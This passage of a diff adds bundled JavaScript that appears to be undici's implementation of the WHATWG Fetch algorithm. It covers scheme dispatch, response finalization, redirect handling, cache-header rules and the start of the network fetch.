If response is not a network error and either request’s method is + // `HEAD` or `CONNECT`, or internalResponse’s status is a null body status, + // set internalResponse’s body to null and disregard any enqueuing toward + // it (if any). + if ( + response.status !== 0 && + (request.method === 'HEAD' || + request.method === 'CONNECT' || + nullBodyStatus.includes(internalResponse.status)) + ) { + internalResponse.body = null + fetchParams.controller.dump = true + } + + // 20. If request’s integrity metadata is not the empty string, then: + if (request.integrity) { + // 1. Let processBodyError be this step: run fetch finale given fetchParams + // and a network error. + const processBodyError = (reason) => + fetchFinale(fetchParams, makeNetworkError(reason)) + + // 2. If request’s response tainting is "opaque", or response’s body is null, + // then run processBodyError and abort these steps. + if (request.responseTainting === 'opaque' || response.body == null) { + processBodyError(response.error) + return + } + + // 3. Let processBody given bytes be these steps: + const processBody = (bytes) => { + // 1. If bytes do not match request’s integrity metadata, + // then run processBodyError and abort these steps. [SRI] + if (!bytesMatch(bytes, request.integrity)) { + processBodyError('integrity mismatch') + return + } + + // 2. Set response’s body to bytes as a body. + response.body = safelyExtractBody(bytes)[0] + + // 3. Run fetch finale given fetchParams and response. + fetchFinale(fetchParams, response) + } + + // 4. Fully read response’s body given processBody and processBodyError. + await fullyReadBody(response.body, processBody, processBodyError) + } else { + // 21. Otherwise, run fetch finale given fetchParams and response. 
+ fetchFinale(fetchParams, response) + } +} + +// https://fetch.spec.whatwg.org/#concept-scheme-fetch +// given a fetch params fetchParams +function schemeFetch (fetchParams) { + // Note: since the connection is destroyed on redirect, which sets fetchParams to a + // cancelled state, we do not want this condition to trigger *unless* there have been + // no redirects. See https://github.com/nodejs/undici/issues/1776 + // 1. If fetchParams is canceled, then return the appropriate network error for fetchParams. + if (isCancelled(fetchParams) && fetchParams.request.redirectCount === 0) { + return Promise.resolve(makeAppropriateNetworkError(fetchParams)) + } + + // 2. Let request be fetchParams’s request. + const { request } = fetchParams + + const { protocol: scheme } = requestCurrentURL(request) + + // 3. Switch on request’s current URL’s scheme and run the associated steps: + switch (scheme) { + case 'about:': { + // If request’s current URL’s path is the string "blank", then return a new response + // whose status message is `OK`, header list is « (`Content-Type`, `text/html;charset=utf-8`) », + // and body is the empty byte sequence as a body. + + // Otherwise, return a network error. + return Promise.resolve(makeNetworkError('about scheme is not supported')) + } + case 'blob:': { + if (!resolveObjectURL) { + resolveObjectURL = (__nccwpck_require__(4300).resolveObjectURL) + } + + // 1. Let blobURLEntry be request’s current URL’s blob URL entry. + const blobURLEntry = requestCurrentURL(request) + + // https://github.com/web-platform-tests/wpt/blob/7b0ebaccc62b566a1965396e5be7bb2bc06f841f/FileAPI/url/resources/fetch-tests.js#L52-L56 + // Buffer.resolveObjectURL does not ignore URL queries. + if (blobURLEntry.search.length !== 0) { + return Promise.resolve(makeNetworkError('NetworkError when attempting to fetch resource.')) + } + + const blobURLEntryObject = resolveObjectURL(blobURLEntry.toString()) + + // 2. 
If request’s method is not `GET`, blobURLEntry is null, or blobURLEntry’s + // object is not a Blob object, then return a network error. + if (request.method !== 'GET' || !isBlobLike(blobURLEntryObject)) { + return Promise.resolve(makeNetworkError('invalid method')) + } + + // 3. Let bodyWithType be the result of safely extracting blobURLEntry’s object. + const bodyWithType = safelyExtractBody(blobURLEntryObject) + + // 4. Let body be bodyWithType’s body. + const body = bodyWithType[0] + + // 5. Let length be body’s length, serialized and isomorphic encoded. + const length = isomorphicEncode(`${body.length}`) + + // 6. Let type be bodyWithType’s type if it is non-null; otherwise the empty byte sequence. + const type = bodyWithType[1] ?? '' + + // 7. Return a new response whose status message is `OK`, header list is + // « (`Content-Length`, length), (`Content-Type`, type) », and body is body. + const response = makeResponse({ + statusText: 'OK', + headersList: [ + ['content-length', { name: 'Content-Length', value: length }], + ['content-type', { name: 'Content-Type', value: type }] + ] + }) + + response.body = body + + return Promise.resolve(response) + } + case 'data:': { + // 1. Let dataURLStruct be the result of running the + // data: URL processor on request’s current URL. + const currentURL = requestCurrentURL(request) + const dataURLStruct = dataURLProcessor(currentURL) + + // 2. If dataURLStruct is failure, then return a + // network error. + if (dataURLStruct === 'failure') { + return Promise.resolve(makeNetworkError('failed to fetch the data URL')) + } + + // 3. Let mimeType be dataURLStruct’s MIME type, serialized. + const mimeType = serializeAMimeType(dataURLStruct.mimeType) + + // 4. Return a response whose status message is `OK`, + // header list is « (`Content-Type`, mimeType) », + // and body is dataURLStruct’s body as a body. 
+ return Promise.resolve(makeResponse({ + statusText: 'OK', + headersList: [ + ['content-type', { name: 'Content-Type', value: mimeType }] + ], + body: safelyExtractBody(dataURLStruct.body)[0] + })) + } + case 'file:': { + // For now, unfortunate as it is, file URLs are left as an exercise for the reader. + // When in doubt, return a network error. + return Promise.resolve(makeNetworkError('not implemented... yet...')) + } + case 'http:': + case 'https:': { + // Return the result of running HTTP fetch given fetchParams. + + return httpFetch(fetchParams) + .catch((err) => makeNetworkError(err)) + } + default: { + return Promise.resolve(makeNetworkError('unknown scheme')) + } + } +} + +// https://fetch.spec.whatwg.org/#finalize-response +function finalizeResponse (fetchParams, response) { + // 1. Set fetchParams’s request’s done flag. + fetchParams.request.done = true + + // 2, If fetchParams’s process response done is not null, then queue a fetch + // task to run fetchParams’s process response done given response, with + // fetchParams’s task destination. + if (fetchParams.processResponseDone != null) { + queueMicrotask(() => fetchParams.processResponseDone(response)) + } +} + +// https://fetch.spec.whatwg.org/#fetch-finale +function fetchFinale (fetchParams, response) { + // 1. If response is a network error, then: + if (response.type === 'error') { + // 1. Set response’s URL list to « fetchParams’s request’s URL list[0] ». + response.urlList = [fetchParams.request.urlList[0]] + + // 2. Set response’s timing info to the result of creating an opaque timing + // info for fetchParams’s timing info. + response.timingInfo = createOpaqueTimingInfo({ + startTime: fetchParams.timingInfo.startTime + }) + } + + // 2. Let processResponseEndOfBody be the following steps: + const processResponseEndOfBody = () => { + // 1. Set fetchParams’s request’s done flag. 
+ fetchParams.request.done = true + + // If fetchParams’s process response end-of-body is not null, + // then queue a fetch task to run fetchParams’s process response + // end-of-body given response with fetchParams’s task destination. + if (fetchParams.processResponseEndOfBody != null) { + queueMicrotask(() => fetchParams.processResponseEndOfBody(response)) + } + } + + // 3. If fetchParams’s process response is non-null, then queue a fetch task + // to run fetchParams’s process response given response, with fetchParams’s + // task destination. + if (fetchParams.processResponse != null) { + queueMicrotask(() => fetchParams.processResponse(response)) + } + + // 4. If response’s body is null, then run processResponseEndOfBody. + if (response.body == null) { + processResponseEndOfBody() + } else { + // 5. Otherwise: + + // 1. Let transformStream be a new a TransformStream. + + // 2. Let identityTransformAlgorithm be an algorithm which, given chunk, + // enqueues chunk in transformStream. + const identityTransformAlgorithm = (chunk, controller) => { + controller.enqueue(chunk) + } + + // 3. Set up transformStream with transformAlgorithm set to identityTransformAlgorithm + // and flushAlgorithm set to processResponseEndOfBody. + const transformStream = new TransformStream({ + start () {}, + transform: identityTransformAlgorithm, + flush: processResponseEndOfBody + }, { + size () { + return 1 + } + }, { + size () { + return 1 + } + }) + + // 4. Set response’s body to the result of piping response’s body through transformStream. + response.body = { stream: response.body.stream.pipeThrough(transformStream) } + } + + // 6. If fetchParams’s process response consume body is non-null, then: + if (fetchParams.processResponseConsumeBody != null) { + // 1. Let processBody given nullOrBytes be this step: run fetchParams’s + // process response consume body given response and nullOrBytes. 
+ const processBody = (nullOrBytes) => fetchParams.processResponseConsumeBody(response, nullOrBytes) + + // 2. Let processBodyError be this step: run fetchParams’s process + // response consume body given response and failure. + const processBodyError = (failure) => fetchParams.processResponseConsumeBody(response, failure) + + // 3. If response’s body is null, then queue a fetch task to run processBody + // given null, with fetchParams’s task destination. + if (response.body == null) { + queueMicrotask(() => processBody(null)) + } else { + // 4. Otherwise, fully read response’s body given processBody, processBodyError, + // and fetchParams’s task destination. + return fullyReadBody(response.body, processBody, processBodyError) + } + return Promise.resolve() + } +} + +// https://fetch.spec.whatwg.org/#http-fetch +async function httpFetch (fetchParams) { + // 1. Let request be fetchParams’s request. + const request = fetchParams.request + + // 2. Let response be null. + let response = null + + // 3. Let actualResponse be null. + let actualResponse = null + + // 4. Let timingInfo be fetchParams’s timing info. + const timingInfo = fetchParams.timingInfo + + // 5. If request’s service-workers mode is "all", then: + if (request.serviceWorkers === 'all') { + // TODO + } + + // 6. If response is null, then: + if (response === null) { + // 1. If makeCORSPreflight is true and one of these conditions is true: + // TODO + + // 2. If request’s redirect mode is "follow", then set request’s + // service-workers mode to "none". + if (request.redirect === 'follow') { + request.serviceWorkers = 'none' + } + + // 3. Set response and actualResponse to the result of running + // HTTP-network-or-cache fetch given fetchParams. + actualResponse = response = await httpNetworkOrCacheFetch(fetchParams) + + // 4. If request’s response tainting is "cors" and a CORS check + // for request and response returns failure, then return a network error. 
+ if ( + request.responseTainting === 'cors' && + corsCheck(request, response) === 'failure' + ) { + return makeNetworkError('cors failure') + } + + // 5. If the TAO check for request and response returns failure, then set + // request’s timing allow failed flag. + if (TAOCheck(request, response) === 'failure') { + request.timingAllowFailed = true + } + } + + // 7. If either request’s response tainting or response’s type + // is "opaque", and the cross-origin resource policy check with + // request’s origin, request’s client, request’s destination, + // and actualResponse returns blocked, then return a network error. + if ( + (request.responseTainting === 'opaque' || response.type === 'opaque') && + crossOriginResourcePolicyCheck( + request.origin, + request.client, + request.destination, + actualResponse + ) === 'blocked' + ) { + return makeNetworkError('blocked') + } + + // 8. If actualResponse’s status is a redirect status, then: + if (redirectStatusSet.has(actualResponse.status)) { + // 1. If actualResponse’s status is not 303, request’s body is not null, + // and the connection uses HTTP/2, then user agents may, and are even + // encouraged to, transmit an RST_STREAM frame. + // See, https://github.com/whatwg/fetch/issues/1288 + if (request.redirect !== 'manual') { + fetchParams.controller.connection.destroy() + } + + // 2. Switch on request’s redirect mode: + if (request.redirect === 'error') { + // Set response to a network error. + response = makeNetworkError('unexpected redirect') + } else if (request.redirect === 'manual') { + // Set response to an opaque-redirect filtered response whose internal + // response is actualResponse. + // NOTE(spec): On the web this would return an `opaqueredirect` response, + // but that doesn't make sense server side. + // See https://github.com/nodejs/undici/issues/1193. 
+ response = actualResponse + } else if (request.redirect === 'follow') { + // Set response to the result of running HTTP-redirect fetch given + // fetchParams and response. + response = await httpRedirectFetch(fetchParams, response) + } else { + assert(false) + } + } + + // 9. Set response’s timing info to timingInfo. + response.timingInfo = timingInfo + + // 10. Return response. + return response +} + +// https://fetch.spec.whatwg.org/#http-redirect-fetch +function httpRedirectFetch (fetchParams, response) { + // 1. Let request be fetchParams’s request. + const request = fetchParams.request + + // 2. Let actualResponse be response, if response is not a filtered response, + // and response’s internal response otherwise. + const actualResponse = response.internalResponse + ? response.internalResponse + : response + + // 3. Let locationURL be actualResponse’s location URL given request’s current + // URL’s fragment. + let locationURL + + try { + locationURL = responseLocationURL( + actualResponse, + requestCurrentURL(request).hash + ) + + // 4. If locationURL is null, then return response. + if (locationURL == null) { + return response + } + } catch (err) { + // 5. If locationURL is failure, then return a network error. + return Promise.resolve(makeNetworkError(err)) + } + + // 6. If locationURL’s scheme is not an HTTP(S) scheme, then return a network + // error. + if (!urlIsHttpHttpsScheme(locationURL)) { + return Promise.resolve(makeNetworkError('URL scheme must be a HTTP(S) scheme')) + } + + // 7. If request’s redirect count is 20, then return a network error. + if (request.redirectCount === 20) { + return Promise.resolve(makeNetworkError('redirect count exceeded')) + } + + // 8. Increase request’s redirect count by 1. + request.redirectCount += 1 + + // 9. If request’s mode is "cors", locationURL includes credentials, and + // request’s origin is not same origin with locationURL’s origin, then return + // a network error. 
+ if ( + request.mode === 'cors' && + (locationURL.username || locationURL.password) && + !sameOrigin(request, locationURL) + ) { + return Promise.resolve(makeNetworkError('cross origin not allowed for request mode "cors"')) + } + + // 10. If request’s response tainting is "cors" and locationURL includes + // credentials, then return a network error. + if ( + request.responseTainting === 'cors' && + (locationURL.username || locationURL.password) + ) { + return Promise.resolve(makeNetworkError( + 'URL cannot contain credentials for request mode "cors"' + )) + } + + // 11. If actualResponse’s status is not 303, request’s body is non-null, + // and request’s body’s source is null, then return a network error. + if ( + actualResponse.status !== 303 && + request.body != null && + request.body.source == null + ) { + return Promise.resolve(makeNetworkError()) + } + + // 12. If one of the following is true + // - actualResponse’s status is 301 or 302 and request’s method is `POST` + // - actualResponse’s status is 303 and request’s method is not `GET` or `HEAD` + if ( + ([301, 302].includes(actualResponse.status) && request.method === 'POST') || + (actualResponse.status === 303 && + !GET_OR_HEAD.includes(request.method)) + ) { + // then: + // 1. Set request’s method to `GET` and request’s body to null. + request.method = 'GET' + request.body = null + + // 2. For each headerName of request-body-header name, delete headerName from + // request’s header list. + for (const headerName of requestBodyHeader) { + request.headersList.delete(headerName) + } + } + + // 13. If request’s current URL’s origin is not same origin with locationURL’s + // origin, then for each headerName of CORS non-wildcard request-header name, + // delete headerName from request’s header list. 
+ if (!sameOrigin(requestCurrentURL(request), locationURL)) { + // https://fetch.spec.whatwg.org/#cors-non-wildcard-request-header-name + request.headersList.delete('authorization') + + // https://fetch.spec.whatwg.org/#authentication-entries + request.headersList.delete('proxy-authorization', true) + + // "Cookie" and "Host" are forbidden request-headers, which undici doesn't implement. + request.headersList.delete('cookie') + request.headersList.delete('host') + } + + // 14. If request’s body is non-null, then set request’s body to the first return + // value of safely extracting request’s body’s source. + if (request.body != null) { + assert(request.body.source != null) + request.body = safelyExtractBody(request.body.source)[0] + } + + // 15. Let timingInfo be fetchParams’s timing info. + const timingInfo = fetchParams.timingInfo + + // 16. Set timingInfo’s redirect end time and post-redirect start time to the + // coarsened shared current time given fetchParams’s cross-origin isolated + // capability. + timingInfo.redirectEndTime = timingInfo.postRedirectStartTime = + coarsenedSharedCurrentTime(fetchParams.crossOriginIsolatedCapability) + + // 17. If timingInfo’s redirect start time is 0, then set timingInfo’s + // redirect start time to timingInfo’s start time. + if (timingInfo.redirectStartTime === 0) { + timingInfo.redirectStartTime = timingInfo.startTime + } + + // 18. Append locationURL to request’s URL list. + request.urlList.push(locationURL) + + // 19. Invoke set request’s referrer policy on redirect on request and + // actualResponse. + setRequestReferrerPolicyOnRedirect(request, actualResponse) + + // 20. Return the result of running main fetch given fetchParams and true. + return mainFetch(fetchParams, true) +} + +// https://fetch.spec.whatwg.org/#http-network-or-cache-fetch +async function httpNetworkOrCacheFetch ( + fetchParams, + isAuthenticationFetch = false, + isNewConnectionFetch = false +) { + // 1. Let request be fetchParams’s request. 
+ const request = fetchParams.request + + // 2. Let httpFetchParams be null. + let httpFetchParams = null + + // 3. Let httpRequest be null. + let httpRequest = null + + // 4. Let response be null. + let response = null + + // 5. Let storedResponse be null. + // TODO: cache + + // 6. Let httpCache be null. + const httpCache = null + + // 7. Let the revalidatingFlag be unset. + const revalidatingFlag = false + + // 8. Run these steps, but abort when the ongoing fetch is terminated: + + // 1. If request’s window is "no-window" and request’s redirect mode is + // "error", then set httpFetchParams to fetchParams and httpRequest to + // request. + if (request.window === 'no-window' && request.redirect === 'error') { + httpFetchParams = fetchParams + httpRequest = request + } else { + // Otherwise: + + // 1. Set httpRequest to a clone of request. + httpRequest = makeRequest(request) + + // 2. Set httpFetchParams to a copy of fetchParams. + httpFetchParams = { ...fetchParams } + + // 3. Set httpFetchParams’s request to httpRequest. + httpFetchParams.request = httpRequest + } + + // 3. Let includeCredentials be true if one of + const includeCredentials = + request.credentials === 'include' || + (request.credentials === 'same-origin' && + request.responseTainting === 'basic') + + // 4. Let contentLength be httpRequest’s body’s length, if httpRequest’s + // body is non-null; otherwise null. + const contentLength = httpRequest.body ? httpRequest.body.length : null + + // 5. Let contentLengthHeaderValue be null. + let contentLengthHeaderValue = null + + // 6. If httpRequest’s body is null and httpRequest’s method is `POST` or + // `PUT`, then set contentLengthHeaderValue to `0`. + if ( + httpRequest.body == null && + ['POST', 'PUT'].includes(httpRequest.method) + ) { + contentLengthHeaderValue = '0' + } + + // 7. If contentLength is non-null, then set contentLengthHeaderValue to + // contentLength, serialized and isomorphic encoded. 
+ if (contentLength != null) { + contentLengthHeaderValue = isomorphicEncode(`${contentLength}`) + } + + // 8. If contentLengthHeaderValue is non-null, then append + // `Content-Length`/contentLengthHeaderValue to httpRequest’s header + // list. + if (contentLengthHeaderValue != null) { + httpRequest.headersList.append('content-length', contentLengthHeaderValue) + } + + // 9. If contentLengthHeaderValue is non-null, then append (`Content-Length`, + // contentLengthHeaderValue) to httpRequest’s header list. + + // 10. If contentLength is non-null and httpRequest’s keepalive is true, + // then: + if (contentLength != null && httpRequest.keepalive) { + // NOTE: keepalive is a noop outside of browser context. + } + + // 11. If httpRequest’s referrer is a URL, then append + // `Referer`/httpRequest’s referrer, serialized and isomorphic encoded, + // to httpRequest’s header list. + if (httpRequest.referrer instanceof URL) { + httpRequest.headersList.append('referer', isomorphicEncode(httpRequest.referrer.href)) + } + + // 12. Append a request `Origin` header for httpRequest. + appendRequestOriginHeader(httpRequest) + + // 13. Append the Fetch metadata headers for httpRequest. [FETCH-METADATA] + appendFetchMetadata(httpRequest) + + // 14. If httpRequest’s header list does not contain `User-Agent`, then + // user agents should append `User-Agent`/default `User-Agent` value to + // httpRequest’s header list. + if (!httpRequest.headersList.contains('user-agent')) { + httpRequest.headersList.append('user-agent', typeof esbuildDetection === 'undefined' ? 'undici' : 'node') + } + + // 15. If httpRequest’s cache mode is "default" and httpRequest’s header + // list contains `If-Modified-Since`, `If-None-Match`, + // `If-Unmodified-Since`, `If-Match`, or `If-Range`, then set + // httpRequest’s cache mode to "no-store". 
+ if ( + httpRequest.cache === 'default' && + (httpRequest.headersList.contains('if-modified-since') || + httpRequest.headersList.contains('if-none-match') || + httpRequest.headersList.contains('if-unmodified-since') || + httpRequest.headersList.contains('if-match') || + httpRequest.headersList.contains('if-range')) + ) { + httpRequest.cache = 'no-store' + } + + // 16. If httpRequest’s cache mode is "no-cache", httpRequest’s prevent + // no-cache cache-control header modification flag is unset, and + // httpRequest’s header list does not contain `Cache-Control`, then append + // `Cache-Control`/`max-age=0` to httpRequest’s header list. + if ( + httpRequest.cache === 'no-cache' && + !httpRequest.preventNoCacheCacheControlHeaderModification && + !httpRequest.headersList.contains('cache-control') + ) { + httpRequest.headersList.append('cache-control', 'max-age=0') + } + + // 17. If httpRequest’s cache mode is "no-store" or "reload", then: + if (httpRequest.cache === 'no-store' || httpRequest.cache === 'reload') { + // 1. If httpRequest’s header list does not contain `Pragma`, then append + // `Pragma`/`no-cache` to httpRequest’s header list. + if (!httpRequest.headersList.contains('pragma')) { + httpRequest.headersList.append('pragma', 'no-cache') + } + + // 2. If httpRequest’s header list does not contain `Cache-Control`, + // then append `Cache-Control`/`no-cache` to httpRequest’s header list. + if (!httpRequest.headersList.contains('cache-control')) { + httpRequest.headersList.append('cache-control', 'no-cache') + } + } + + // 18. If httpRequest’s header list contains `Range`, then append + // `Accept-Encoding`/`identity` to httpRequest’s header list. + if (httpRequest.headersList.contains('range')) { + httpRequest.headersList.append('accept-encoding', 'identity') + } + + // 19. Modify httpRequest’s header list per HTTP. Do not append a given + // header if httpRequest’s header list contains that header’s name. 
+ // TODO: https://github.com/whatwg/fetch/issues/1285#issuecomment-896560129 + if (!httpRequest.headersList.contains('accept-encoding')) { + if (urlHasHttpsScheme(requestCurrentURL(httpRequest))) { + httpRequest.headersList.append('accept-encoding', 'br, gzip, deflate') + } else { + httpRequest.headersList.append('accept-encoding', 'gzip, deflate') + } + } + + httpRequest.headersList.delete('host') + + // 20. If includeCredentials is true, then: + if (includeCredentials) { + // 1. If the user agent is not configured to block cookies for httpRequest + // (see section 7 of [COOKIES]), then: + // TODO: credentials + // 2. If httpRequest’s header list does not contain `Authorization`, then: + // TODO: credentials + } + + // 21. If there’s a proxy-authentication entry, use it as appropriate. + // TODO: proxy-authentication + + // 22. Set httpCache to the result of determining the HTTP cache + // partition, given httpRequest. + // TODO: cache + + // 23. If httpCache is null, then set httpRequest’s cache mode to + // "no-store". + if (httpCache == null) { + httpRequest.cache = 'no-store' + } + + // 24. If httpRequest’s cache mode is neither "no-store" nor "reload", + // then: + if (httpRequest.mode !== 'no-store' && httpRequest.mode !== 'reload') { + // TODO: cache + } + + // 9. If aborted, then return the appropriate network error for fetchParams. + // TODO + + // 10. If response is null, then: + if (response == null) { + // 1. If httpRequest’s cache mode is "only-if-cached", then return a + // network error. + if (httpRequest.mode === 'only-if-cached') { + return makeNetworkError('only if cached') + } + + // 2. Let forwardResponse be the result of running HTTP-network fetch + // given httpFetchParams, includeCredentials, and isNewConnectionFetch. + const forwardResponse = await httpNetworkFetch( + httpFetchParams, + includeCredentials, + isNewConnectionFetch + ) + + // 3. 
If httpRequest’s method is unsafe and forwardResponse’s status is + // in the range 200 to 399, inclusive, invalidate appropriate stored + // responses in httpCache, as per the "Invalidation" chapter of HTTP + // Caching, and set storedResponse to null. [HTTP-CACHING] + if ( + !safeMethodsSet.has(httpRequest.method) && + forwardResponse.status >= 200 && + forwardResponse.status <= 399 + ) { + // TODO: cache + } + + // 4. If the revalidatingFlag is set and forwardResponse’s status is 304, + // then: + if (revalidatingFlag && forwardResponse.status === 304) { + // TODO: cache + } + + // 5. If response is null, then: + if (response == null) { + // 1. Set response to forwardResponse. + response = forwardResponse + + // 2. Store httpRequest and forwardResponse in httpCache, as per the + // "Storing Responses in Caches" chapter of HTTP Caching. [HTTP-CACHING] + // TODO: cache + } + } + + // 11. Set response’s URL list to a clone of httpRequest’s URL list. + response.urlList = [...httpRequest.urlList] + + // 12. If httpRequest’s header list contains `Range`, then set response’s + // range-requested flag. + if (httpRequest.headersList.contains('range')) { + response.rangeRequested = true + } + + // 13. Set response’s request-includes-credentials to includeCredentials. + response.requestIncludesCredentials = includeCredentials + + // 14. If response’s status is 401, httpRequest’s response tainting is not + // "cors", includeCredentials is true, and request’s window is an environment + // settings object, then: + // TODO + + // 15. If response’s status is 407, then: + if (response.status === 407) { + // 1. If request’s window is "no-window", then return a network error. + if (request.window === 'no-window') { + return makeNetworkError() + } + + // 2. ??? + + // 3. If fetchParams is canceled, then return the appropriate network error for fetchParams. + if (isCancelled(fetchParams)) { + return makeAppropriateNetworkError(fetchParams) + } + + // 4. 
Prompt the end user as appropriate in request’s window and store + // the result as a proxy-authentication entry. [HTTP-AUTH] + // TODO: Invoke some kind of callback? + + // 5. Set response to the result of running HTTP-network-or-cache fetch given + // fetchParams. + // TODO + return makeNetworkError('proxy authentication required') + } + + // 16. If all of the following are true + if ( + // response’s status is 421 + response.status === 421 && + // isNewConnectionFetch is false + !isNewConnectionFetch && + // request’s body is null, or request’s body is non-null and request’s body’s source is non-null + (request.body == null || request.body.source != null) + ) { + // then: + + // 1. If fetchParams is canceled, then return the appropriate network error for fetchParams. + if (isCancelled(fetchParams)) { + return makeAppropriateNetworkError(fetchParams) + } + + // 2. Set response to the result of running HTTP-network-or-cache + // fetch given fetchParams, isAuthenticationFetch, and true. + + // TODO (spec): The spec doesn't specify this but we need to cancel + // the active response before we can start a new one. + // https://github.com/whatwg/fetch/issues/1293 + fetchParams.controller.connection.destroy() + + response = await httpNetworkOrCacheFetch( + fetchParams, + isAuthenticationFetch, + true + ) + } + + // 17. If isAuthenticationFetch is true, then create an authentication entry + if (isAuthenticationFetch) { + // TODO + } + + // 18. Return response. + return response +} + +// https://fetch.spec.whatwg.org/#http-network-fetch +async function httpNetworkFetch ( + fetchParams, + includeCredentials = false, + forceNewConnection = false +) { + assert(!fetchParams.controller.connection || fetchParams.controller.connection.destroyed) + + fetchParams.controller.connection = { + abort: null, + destroyed: false, + destroy (err) { + if (!this.destroyed) { + this.destroyed = true + this.abort?.(err ?? 
new DOMException('The operation was aborted.', 'AbortError')) + } + } + } + + // 1. Let request be fetchParams’s request. + const request = fetchParams.request + + // 2. Let response be null. + let response = null + + // 3. Let timingInfo be fetchParams’s timing info. + const timingInfo = fetchParams.timingInfo + + // 4. Let httpCache be the result of determining the HTTP cache partition, + // given request. + // TODO: cache + const httpCache = null + + // 5. If httpCache is null, then set request’s cache mode to "no-store". + if (httpCache == null) { + request.cache = 'no-store' + } + + // 6. Let networkPartitionKey be the result of determining the network + // partition key given request. + // TODO + + // 7. Let newConnection be "yes" if forceNewConnection is true; otherwise + // "no". + const newConnection = forceNewConnection ? 'yes' : 'no' // eslint-disable-line no-unused-vars + + // 8. Switch on request’s mode: + if (request.mode === 'websocket') { + // Let connection be the result of obtaining a WebSocket connection, + // given request’s current URL. + // TODO + } else { + // Let connection be the result of obtaining a connection, given + // networkPartitionKey, request’s current URL’s origin, + // includeCredentials, and forceNewConnection. + // TODO + } + + // 9. Run these steps, but abort when the ongoing fetch is terminated: + + // 1. If connection is failure, then return a network error. + + // 2. Set timingInfo’s final connection timing info to the result of + // calling clamp and coarsen connection timing info with connection’s + // timing info, timingInfo’s post-redirect start time, and fetchParams’s + // cross-origin isolated capability. + + // 3. If connection is not an HTTP/2 connection, request’s body is non-null, + // and request’s body’s source is null, then append (`Transfer-Encoding`, + // `chunked`) to request’s header list. + + // 4. 
Set timingInfo’s final network-request start time to the coarsened + // shared current time given fetchParams’s cross-origin isolated + // capability. + + // 5. Set response to the result of making an HTTP request over connection + // using request with the following caveats: + + // - Follow the relevant requirements from HTTP. [HTTP] [HTTP-SEMANTICS] + // [HTTP-COND] [HTTP-CACHING] [HTTP-AUTH] + + // - If request’s body is non-null, and request’s body’s source is null, + // then the user agent may have a buffer of up to 64 kibibytes and store + // a part of request’s body in that buffer. If the user agent reads from + // request’s body beyond that buffer’s size and the user agent needs to + // resend request, then instead return a network error. + + // - Set timingInfo’s final network-response start time to the coarsened + // shared current time given fetchParams’s cross-origin isolated capability, + // immediately after the user agent’s HTTP parser receives the first byte + // of the response (e.g., frame header bytes for HTTP/2 or response status + // line for HTTP/1.x). + + // - Wait until all the headers are transmitted. + + // - Any responses whose status is in the range 100 to 199, inclusive, + // and is not 101, are to be ignored, except for the purposes of setting + // timingInfo’s final network-response start time above. + + // - If request’s header list contains `Transfer-Encoding`/`chunked` and + // response is transferred via HTTP/1.0 or older, then return a network + // error. + + // - If the HTTP request results in a TLS client certificate dialog, then: + + // 1. If request’s window is an environment settings object, make the + // dialog available in request’s window. + + // 2. Otherwise, return a network error. + + // To transmit request’s body body, run these steps: + let requestBody = null + // 1. 
If body is null and fetchParams’s process request end-of-body is + // non-null, then queue a fetch task given fetchParams’s process request + // end-of-body and fetchParams’s task destination. + if (request.body == null && fetchParams.processRequestEndOfBody) { + queueMicrotask(() => fetchParams.processRequestEndOfBody()) + } else if (request.body != null) { + // 2. Otherwise, if body is non-null: + + // 1. Let processBodyChunk given bytes be these steps: + const processBodyChunk = async function * (bytes) { + // 1. If the ongoing fetch is terminated, then abort these steps. + if (isCancelled(fetchParams)) { + return + } + + // 2. Run this step in parallel: transmit bytes. + yield bytes + + // 3. If fetchParams’s process request body is non-null, then run + // fetchParams’s process request body given bytes’s length. + fetchParams.processRequestBodyChunkLength?.(bytes.byteLength) + } + + // 2. Let processEndOfBody be these steps: + const processEndOfBody = () => { + // 1. If fetchParams is canceled, then abort these steps. + if (isCancelled(fetchParams)) { + return + } + + // 2. If fetchParams’s process request end-of-body is non-null, + // then run fetchParams’s process request end-of-body. + if (fetchParams.processRequestEndOfBody) { + fetchParams.processRequestEndOfBody() + } + } + + // 3. Let processBodyError given e be these steps: + const processBodyError = (e) => { + // 1. If fetchParams is canceled, then abort these steps. + if (isCancelled(fetchParams)) { + return + } + + // 2. If e is an "AbortError" DOMException, then abort fetchParams’s controller. + if (e.name === 'AbortError') { + fetchParams.controller.abort() + } else { + fetchParams.controller.terminate(e) + } + } + + // 4. Incrementally read request’s body given processBodyChunk, processEndOfBody, + // processBodyError, and fetchParams’s task destination. 
+ requestBody = (async function * () { + try { + for await (const bytes of request.body.stream) { + yield * processBodyChunk(bytes) + } + processEndOfBody() + } catch (err) { + processBodyError(err) + } + })() + } + + try { + // socket is only provided for websockets + const { body, status, statusText, headersList, socket } = await dispatch({ body: requestBody }) + + if (socket) { + response = makeResponse({ status, statusText, headersList, socket }) + } else { + const iterator = body[Symbol.asyncIterator]() + fetchParams.controller.next = () => iterator.next() + + response = makeResponse({ status, statusText, headersList }) + } + } catch (err) { + // 10. If aborted, then: + if (err.name === 'AbortError') { + // 1. If connection uses HTTP/2, then transmit an RST_STREAM frame. + fetchParams.controller.connection.destroy() + + // 2. Return the appropriate network error for fetchParams. + return makeAppropriateNetworkError(fetchParams, err) + } + + return makeNetworkError(err) + } + + // 11. Let pullAlgorithm be an action that resumes the ongoing fetch + // if it is suspended. + const pullAlgorithm = () => { + fetchParams.controller.resume() + } + + // 12. Let cancelAlgorithm be an algorithm that aborts fetchParams’s + // controller with reason, given reason. + const cancelAlgorithm = (reason) => { + fetchParams.controller.abort(reason) + } + + // 13. Let highWaterMark be a non-negative, non-NaN number, chosen by + // the user agent. + // TODO + + // 14. Let sizeAlgorithm be an algorithm that accepts a chunk object + // and returns a non-negative, non-NaN, non-infinite number, chosen by the user agent. + // TODO + + // 15. Let stream be a new ReadableStream. + // 16. Set up stream with pullAlgorithm set to pullAlgorithm, + // cancelAlgorithm set to cancelAlgorithm, highWaterMark set to + // highWaterMark, and sizeAlgorithm set to sizeAlgorithm. 
